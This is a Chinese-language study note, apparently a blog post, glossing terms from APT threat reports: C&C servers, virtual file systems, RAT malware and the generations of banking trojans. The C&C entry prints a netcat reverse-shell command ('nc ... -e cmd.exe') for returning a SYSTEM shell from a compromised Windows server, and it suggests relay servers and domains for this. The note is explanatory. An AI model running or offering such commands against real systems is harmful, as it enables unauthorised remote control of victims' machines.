浏览 APT 报告中学习积累

工具网站积累：（APT 报告搜寻网站）

https://ti.qianxin.com/
https://feed.watcherlab.com/index/apt
https://malpedia.caad.fkie.fraunhofer.de/

专业词积累

C&C 服务器

参考链接： https://cloud.tencent.com/developer/article/1180887

通常我们在做渗透测试的时候，在拿到一个 webshell 的时候，我们需要对服务器进行提权操作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令，而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要我们将系统权限的 cmd shell 反弹回本地。

这里我们使用 nc 在本地执行：

nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设你的电脑 IP 是公网的，并且 IP 为 114.114.114.114。

然后在目标服务器就可以执行：

nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回给你，这时你的本机电脑就是一个简易的 C&C 服务器。

如图简单的解释上面的过程：

如果你的本机电脑是在内网中，没有公网 IP，目标服务器也在内网，这时目标不能直接通过 IP 地址连接到你本机，此时我们则需要一台公网服务器做中转了。

再延伸一下，由于 IP 地址是随着中转服务器的变化而变化的，每次 IP 的变化都会导致整个过程都要重新操作一次，每个命令语句都要进行修改，那么我们就可以将上面语句中的 IP 地址修改为我们注册的域名，然后将域名解析到我们的中转服务器，这样即使我们更换了中转服务器，我们也不需要更改执行过的命令。

虚拟文件系统：

参考链接：
https://baike.baidu.com/item/%E8%99%9A%E6%8B%9F%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F/10986803?fr=aladdin

虚拟文件系统 (VFS) 是由 Sun microsystems 公司在定义网络文件系统 (NFS) 时创造的。它是一种用于网络环境的分布式文件系统，是允许和操作系统使用不同的文件系统实现的接口。虚拟文件系统（VFS）是物理文件系统与服务之间的一个接口层，它对 Linux 的每个文件系统的所有细节进行抽象，使得不同的文件系统在 Linux 核心以及系统中运行的其他进程看来，都是相同的。严格说来，VFS 并不是一种实际的文件系统。它只存在于内存中，不存在于任何外存空间。VFS 在系统启动时建立，在系统关闭时消亡。

RAT 恶意软件

参考链接：
https://www.sysgeek.cn/what-rat-malware/

远程访问特洛伊木马（RAT，Remote Access Trojan）是一种恶意软件，能够让黑客监视和控制您的计算机、网络设备甚至整个网络。

银行木马

参考链接：
https://baike.baidu.com/item/%E9%93%B6%E8%A1%8C%E6%9C%A8%E9%A9%AC/15669586

恶意软件中最邪恶的一种，直接从你的银行账号中取走钱的银行木马。

第一代是在 2001 年之前的变种，作为普通后门，进驻用户 PC。接着黑客通过后门进入，并获得对用户信息的访问。

Stewart 记录的例子是 BackOrfice，第一次出现在 1998 年。

第二代银行木马针对性更强，预先打包，然后寻找所需信息、自动实施盗窃。
“bancos” 木马就是一个有许多变种的第二代的典型例子。据 Stewart 所言，变种数量和各种银行木马真正的名称都不容易确定，因为不同的反病毒公司对同样的病毒的命名是不一致的。

至于 Bancos，赛门铁克的数据库中就记载了 26 个不同名字的变种。

第三代银行木马事实上可以自动模拟用户行为。
Steward 说：第三代银行木马会偷走你的信息，然后从你的账户中取走钱。第三代银行木马是以 “Win32.Grams” 的出现开始的，时间是 2004 年。